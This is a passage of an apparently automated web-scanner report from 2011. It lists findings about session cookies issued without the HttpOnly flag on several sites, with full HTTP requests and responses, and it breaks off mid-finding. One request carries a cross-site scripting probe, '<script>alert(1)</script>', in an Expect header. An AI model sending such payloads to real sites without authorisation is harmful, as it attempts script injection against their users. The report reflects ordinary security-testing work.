Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/08/before-en.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/08/before-en.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:46:35 GMT
Server: Apache
Set-Cookie: PHPSESSID=e3tmqsse418t5e97gc66chvei2; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:46:36 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
17.35. http://www.seoq.com/wp-content/uploads/2008/08/circuit-city-stock-price-crash.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/08/circuit-city-stock-price-crash.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/08/circuit-city-stock-price-crash.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:45:58 GMT
Server: Apache
Set-Cookie: PHPSESSID=fgl2jovfcb50uf72m2fkieceq6; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:45:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12841

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
17.36. http://www.seoq.com/wp-content/uploads/2008/08/target-stock-on-the-rise1.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/08/target-stock-on-the-rise1.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/08/target-stock-on-the-rise1.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:46:25 GMT
Server: Apache
Set-Cookie: PHPSESSID=7uj7e9ldpg45knc7fkags98qi0; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:46:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12836

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
17.37. http://www.seoq.com/wp-content/uploads/2008/08/target.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/08/target.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/08/target.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:44:57 GMT
Server: Apache
Set-Cookie: PHPSESSID=mpoko4q3f16vbpjlk8pjk1d350; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:44:58 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
17.38. http://www.seoq.com/wp-content/uploads/2008/09/biznik-professional-networking-site.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/09/biznik-professional-networking-site.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/09/biznik-professional-networking-site.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:45:29 GMT
Server: Apache
Set-Cookie: PHPSESSID=pbhe1jtfilvbh1gnd13tgl5r87; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:45:29 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
17.39. http://www.seoq.com/wp-content/uploads/2008/09/g1-google-iphone-by-t-mobile.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/09/g1-google-iphone-by-t-mobile.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/09/g1-google-iphone-by-t-mobile.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:45:17 GMT
Server: Apache
Set-Cookie: PHPSESSID=q3oq59gdqk5qddjugp1t6q68v6; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:45:18 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
17.40. http://www.seoq.com/wp-content/uploads/2008/09/search-statistics.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/09/search-statistics.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/09/search-statistics.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:45:19 GMT
Server: Apache
Set-Cookie: PHPSESSID=g6ot4dlqueel2sdr2ham4iut67; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:45:20 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
17.41. http://www.seoq.com/wp-content/uploads/2008/10/bilingual-english-spanish-web-designer-developer-andrea.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/10/bilingual-english-spanish-web-designer-developer-andrea.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/10/bilingual-english-spanish-web-designer-developer-andrea.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:41:28 GMT
Server: Apache
Set-Cookie: PHPSESSID=lmg6fbb6836tkiuk0pjr3evdb1; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:41:28 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
17.42. http://www.seoq.com/wp-content/uploads/2008/10/bilingual-english-spanish-web-designer-developer-margaret.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/10/bilingual-english-spanish-web-designer-developer-margaret.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/10/bilingual-english-spanish-web-designer-developer-margaret.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:41:45 GMT
Server: Apache
Set-Cookie: PHPSESSID=795fl6vdjvfli5lse7vr7r06p0; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:41:46 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
17.43. http://www.seoq.com/wp-content/uploads/2008/10/bilingual-english-spanish-web-designer-developer-tina.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/10/bilingual-english-spanish-web-designer-developer-tina.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/10/bilingual-english-spanish-web-designer-developer-tina.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:12:24 GMT
Server: Apache
Set-Cookie: PHPSESSID=tr4ndjjlpd3e82sbn9f6m8d2r7; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:12:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12864

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
17.44. http://www.seoq.com/wp-content/uploads/2008/10/e-trade-sucks-10-12-minutes-to-get-started.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/10/e-trade-sucks-10-12-minutes-to-get-started.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/10/e-trade-sucks-10-12-minutes-to-get-started.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:45:36 GMT
Server: Apache
Set-Cookie: PHPSESSID=m02j41rctmjgo8tsvi3hbfo097; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:45:36 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
17.45. http://www.seoq.com/wp-content/uploads/2008/10/e-trade-sucks-not-fast-and-easy.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/10/e-trade-sucks-not-fast-and-easy.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/10/e-trade-sucks-not-fast-and-easy.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:46:13 GMT
Server: Apache
Set-Cookie: PHPSESSID=f1qmk0sk5uki5li2ehj6rqc7b0; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:46:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
17.46. http://www.seoq.com/wp-content/uploads/2008/10/google-stock-rebound.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/10/google-stock-rebound.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/10/google-stock-rebound.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:45:50 GMT
Server: Apache
Set-Cookie: PHPSESSID=ns0b5okivesekmg9ppqr13q891; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:45:51 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
17.47. http://www.seoq.com/wp-content/uploads/2008/11/change-gov-president-obama-transition-team.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/11/change-gov-president-obama-transition-team.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/11/change-gov-president-obama-transition-team.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:12:24 GMT
Server: Apache
Set-Cookie: PHPSESSID=vfiqd2ekptb8ecvbrq2rprvk87; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:12:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
17.48. http://www.seoq.com/wp-content/uploads/2008/11/circuit-city-stock-price-cc.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/11/circuit-city-stock-price-cc.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/11/circuit-city-stock-price-cc.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:12:24 GMT
Server: Apache
Set-Cookie: PHPSESSID=ep58rjkns66nvt4jbkb8qb8jd2; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:12:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
17.49. http://www.seoq.com/wp-content/uploads/2008/12/iphone-starbucks-partnership.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/12/iphone-starbucks-partnership.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/12/iphone-starbucks-partnership.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:12:25 GMT
Server: Apache
Set-Cookie: PHPSESSID=mh811o08atu0mld55rag6g7c94; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:12:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
17.50. http://www.trafficspaces.net/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.trafficspaces.net
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.trafficspaces.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BF8A112B9F95B5CC3B2540868CFE0F67; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 02 May 2011 00:53:40 GMT
Content-Length: 599

<!--TRAFFICSPACES_ERROR-->
<div class="content" style="margin-top: 20px">
   <div class="pagenotice">
       <!--<div id="rdcr">--><b class="rdcrtop"><b class="rdcr1"></b><b class="rdcr2"></b><b class="rd
...[SNIP]...
17.51. http://www.washingtonpost.com/wl/jobs/home  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.washingtonpost.com
Path:   /wl/jobs/home

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Web Server
Content-Type: text/html; charset=ISO8859_1
Expires: Sun, 01 May 2011 23:32:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 01 May 2011 23:32:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: WashingtonJobsSession=qZrzN9tFJw3JhJnTRRd4t88nZFhtDgPRL1L4JF6PJZZvhvG4smnP!-945584298; domain=.washingtonpost.com; path=/
Content-Length: 35809


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<!--Server: jobs3a GUID:f823c81588328017643c787765c5da54 Sun May 01 19:32:53 EDT 2011-->
<head>
<title>
   
       
...[SNIP]...
17.52. http://a.triggit.com/px  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.triggit.com
Path:   /px

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /px?cb=s7l8ya&i=CAEQAiiybjINamFwYW5hdG9yLmNvbUABShhUYjRQT3dBQkt5VUsyaUpMSU1sNHlnPT1Qu5747QRd4XoEQGAAcg8xNzMuMTkzLjIxNC4yNDN4AIABvhmKARUvZWxlcGhhbnQvbG9naW4ucGh0bWw=&gwp=Tb4POwABKyUK2iJLIMl4yvxpGNYmaYG7q1B5DA HTTP/1.1
Host: a.triggit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trgu=c1e1301e-3a1f-4ca7-9870-f636b5f10e66

Response

